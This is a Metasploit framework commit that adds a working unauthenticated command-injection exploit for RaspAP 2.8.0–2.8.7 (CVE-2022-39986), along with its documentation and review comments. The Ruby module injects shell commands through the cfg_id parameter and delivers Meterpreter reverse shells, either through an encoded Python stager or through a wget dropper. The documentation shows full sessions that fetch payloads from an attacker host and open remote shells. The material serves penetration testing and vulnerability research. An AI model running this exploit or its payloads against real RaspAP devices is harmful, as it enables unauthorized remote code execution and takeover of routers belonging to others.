Land #18263, Add RaspAP Unauth Command Injection
This PR adds an unauthenticated command injection
module for the RaspAP webgui application.
jheysel-r7 committed Aug 15, 2023
2 parents 0203209 + 99e78a4 commit 6cf136e
Showing 2 changed files with 211 additions and 0 deletions.
95 changes: 95 additions & 0 deletions documentation/modules/exploit/unix/http/raspap_rce.md
@@ -0,0 +1,95 @@
## Vulnerable Application

RaspAP is feature-rich wireless router software that just works
on many popular Debian-based devices, including the Raspberry Pi.

A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
unauthenticated attackers to execute arbitrary commands via the cfg_id
parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
arbitrary commands in the context of the user running RaspAP. This issue was discovered and reported by Ismael0x00.
Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.

## Testing
For installing the vulnerable version follow the steps below,
1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
2. After setting up the service, navigate to the `/var/www/html` directory
3. Do `git checkout 2.8.0` for switching to the vulnerable version

**Note: Project can also be installed inside a ubuntu/debian docker containers**

## Verification Steps

1. msfconsole
2. Do: `use exploit/unix/http/raspap_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `check`

## Options

## Scenarios

### Debian 12, Unix Command Target
```
msf6 > use exploit/unix/http/raspap_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : debian
OS : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter : python/linux
meterpreter >
```

### Debian 11, Linux Dropper Target
```
msf6 > use exploit/unix/http/raspap_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(unix/http/raspap_rce) > set target 1
target => 1
msf6 exploit(unix/http/raspap_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper
[*] Using URL: http://172.17.0.1:8080/cH0NvADRgGYZoL
[*] Client 172.17.0.2 (Wget/1.21) requested /cH0NvADRgGYZoL
[*] Sending payload to 172.17.0.2 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48940) at 2023-08-10 00:37:27 +0200
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 11.6 (Linux 6.4.7-hardened1-2-hardened)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
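Review bot: the `## Options` section is empty although the module registers `TARGETURI` (default `/`) and overrides `RPORT` to 80; document both there, since a RaspAP instance served under a sub-path or on a non-default port will need them. The Verification Steps also stop at `check` while both scenarios rely on `set lhost` and `run`; add those two steps so the documented procedure reaches a session. Minor wording in the description: "thru" should be "through" and "A Command injection" should read "A command injection".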
116 changes: 116 additions & 0 deletions modules/exploits/unix/http/raspap_rce.rb
@@ -0,0 +1,116 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'RaspAP Unauthenticated Command Injection',
'Description' => %q{
RaspAP is feature-rich wireless router software that just works
on many popular Debian-based devices, including the Raspberry Pi.
A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id
parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
Successfully tested against RaspAP 2.8.0 and 2.8.7.
},
'License' => MSF_LICENSE,
'Author' => [
'Ege BALCI <egebalci[at]pm.me>', # msf module
'Ismael0x00', # original PoC, analysis
],
'References' => [
['CVE', '2022-39986'],
['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
],
'Platform' => ['unix', 'linux'],
'Privileged' => false,
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => :wget,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DisclosureDate' => '2023-07-31',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])
]
)
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
'method' => 'POST'
)
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

if res.code == 200
return CheckCode::Appears
end

CheckCode::Safe
end

def execute_command(cmd, _opts = {})
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
'method' => 'POST',
'vars_post' => {
'cfg_id' => ";#{cmd};#"
}
)
end

def exploit
case target['Type']
when :unix_cmd
print_status("Executing #{target.name} with #{payload.encoded}")
execute_command(payload.encoded)
when :linux_dropper
print_status("Executing #{target.name}")
execute_cmdstager
end
end
end
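Review bot: `check` returns `CheckCode::Appears` on any HTTP 200 from a POST to `del_ovpncfg.php`, which only proves the endpoint exists; a patched install (2.8.8 or later) that still serves the script would be reported as vulnerable, so the check should distinguish versions, for example by reading a version indicator from the web UI, and otherwise fall back to `CheckCode::Detected`. `'SideEffects' => []` is also inaccurate: the `Linux Dropper` target uses the `:wget` CmdStager flavor, which writes the payload to disk on the target, and every request to `/ajax/openvpn/del_ovpncfg.php` lands in the web server log, so `ARTIFACTS_ON_DISK` and `IOC_IN_LOGS` should be listed. Finally, the `DisclosureDate` of `2023-07-31` sits beside a 2022 CVE identifier; please confirm which date the reference writeup supports.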
